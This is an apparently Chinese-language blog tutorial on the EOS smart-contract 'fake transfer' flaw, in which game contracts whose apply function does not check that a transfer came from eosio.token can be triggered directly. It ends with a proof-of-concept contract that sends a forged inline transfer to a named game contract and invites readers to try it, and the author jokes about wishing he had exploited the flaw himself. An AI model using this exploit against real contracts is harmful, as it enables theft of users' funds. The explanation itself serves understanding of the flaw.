佛日,人生有八苦,其三:求不得、怨憎会、爱离别。
说老实话,当周五bet被攻击的时候,当aabbccddeefg褥走5万柚子的时候,还是无耻邪恶了一把,当时的内心独白:“艹,我怎么没想到.....,5*30 = 120 ≈ 一套房.....”。不过,本人资质驽钝,总是后知后觉,如此,也就蛋定许多(∩_∩)。
合约要从c++变成可部署的,需要两个文件, *.wast or *.wasm,*.abi,其中*.abi是接口描述,比如:
{
"____comment": "This file was generated by eosio-abigen. DO NOT EDIT - 2018-09-15T00:05:19",
"version": "eosio::abi/1.0",
"types": [],
"structs": [{
"name": "hi",
"base": "",
"fields": [{
"name": "from",
"type": "name"
},{
"name": "to",
"type": "name"
},{
"name": "quantity",
"type": "asset"
},{
"name": "memo",
"type": "string"
}
]
}
],
"actions": [{
"name": "hi",
"type": "hi",
"ricardian_contract": ""
}
],
"tables": [],
"ricardian_clauses": [],
"error_messages": [],
"abi_extensions": []
}
描述了一个合约中的“hi”函数有哪些输入,以及输入的类型。这样,在我们用“cleos push action”调用合约的时候,可以根据合约的abi解析相应的参数。
比如:
cleos push action abc hi '["abc", "xiaomiantuan" , "0.0200 SYS","" ]' -p abc
则解析from为“abc”。
正常的话,如果没有abi,则我们无法解析传入的参数,也就无法调用合约。
我们玩一个eos的游戏,正常的套路是给这个游戏合约打钱。比如xiaomiantuan合约,我们给xiaomiantuan合约打钱,xiaomiantuan怎么知道我们给它打了钱呢?其实我们给xiaomiantuan打钱,是调用了eosio.token合约的transfer。
void token::transfer( account_name from,
account_name to,
asset quantity,
string memo )
{
eosio_assert( from != to, "cannot transfer to self" );
require_auth( from );
eosio_assert( is_account( to ), "to account does not exist");
auto sym = quantity.symbol.name();
stats statstable( _self, sym );
const auto& st = statstable.get( sym );
require_recipient( from );
require_recipient( to );
eosio_assert( quantity.is_valid(), "invalid quantity" );
eosio_assert( quantity.amount > 0, "must transfer positive quantity" );
eosio_assert( quantity.symbol == st.supply.symbol, "symbol precision mismatch" );
eosio_assert( memo.size() <= 256, "memo has more than 256 bytes" );
sub_balance( from, quantity );
add_balance( to, quantity, from );
}
这里,require_recipient的含义就是通知xiaomiantuan。所谓“通知”,其实是尝试调用xiaomiantuan的某个“transfer”函数。
它最终会调用xiaomiantuan中定义的:
apply( uint64_t receiver, uint64_t code, uint64_t action )
其中 receiver : xiaomiantuan ; code:eosio.token ; action: transfer
在我们写合约的时候,最后一般会有EOSIO_ABI(xxxx)
#define EOSIO_ABI( TYPE, MEMBERS ) \
extern "C" { \
void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \
auto self = receiver; \
if( action == N(onerror)) { \
/* onerror is only valid if it is for the "eosio" code account and authorized by "eosio"'s "active permission */ \
eosio_assert(code == N(eosio), "onerror action's are only valid from the \"eosio\" system account"); \
} \
if( code == self || action == N(onerror) ) { \
TYPE thiscontract( self ); \
switch( action ) { \
EOSIO_API( TYPE, MEMBERS ) \
} \
/* does not allow destructor of thiscontract to run: eosio_exit(0); */ \
} \
} \
} \
这里会做一个判断:code == self 因此如果我们不自己写apply函数,调用apply( xiaomiantuan, eosio.token, transfer )什么都不会发生,但一般来说,游戏合约会重写这个函数,使得调用发生点什么。而有的合约,并没有判断第二个参数是否是“eosio.token”,因此,傻乎乎的发生了不该发生的事,这就是今天所说的“漏洞”。
比如:
extern "C" { \
void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \
auto self = receiver; \
if( action == N(onerror)) { \
/* onerror is only valid if it is for the "eosio" code account and authorized by "eosio"'s "active permission */ \
eosio_assert(code == N(eosio), "onerror action's are only valid from the \"eosio\" system account"); \
} \
if(action == N(transfer)){\
print("aabbccddef");\
return;\
}\
if( code == self || action == N(onerror) ) { \
TYPE thiscontract( self ); \
switch( action ) { \
EOSIO_API( TYPE, MEMBERS ) \
} \
/* does not allow destructor of thiscontract to run: eosio_exit(0); */ \
} \
} \
} \
重新写了apply函数之后,并不会生成“transfer”的abi,但调用还是那个调用,不过用“cleos push action xxx”是不可能了,这一辈子都不可能了。但是,至少,好像使用require_recipient可以,哈哈。
这是因为在合约内部调用不需要像“cleos push action xxx”一样解析参数类型,此时参数已经是现成的了。所以,聪明如你,试试下面这个:
#include
#include
#include
#include
using namespace eosio;
class hello : public eosio::contract {
public:
using contract::contract;
/// @abi action
void hi( account_name from,
account_name to,
asset quantity,
std::string memo )
{
action(permission_level{_self, N(active)}, N(xiaomiantuan),
N(transfer), std::make_tuple(_self, N(xiaomiantuan), quantity,
std::string("")))
.send();
}
};
EOSIO_ABI( hello, (hi) )
上面的程序直接发起一个内联调用,参数已经直接提供,因此也不需要通过“abi”来解析参数,因此如果xiaomiantuan合约的transfer有漏洞的话,这个内联是会成功调用的。
。。。。
终于写完了,最后,,,合约真真细致的干活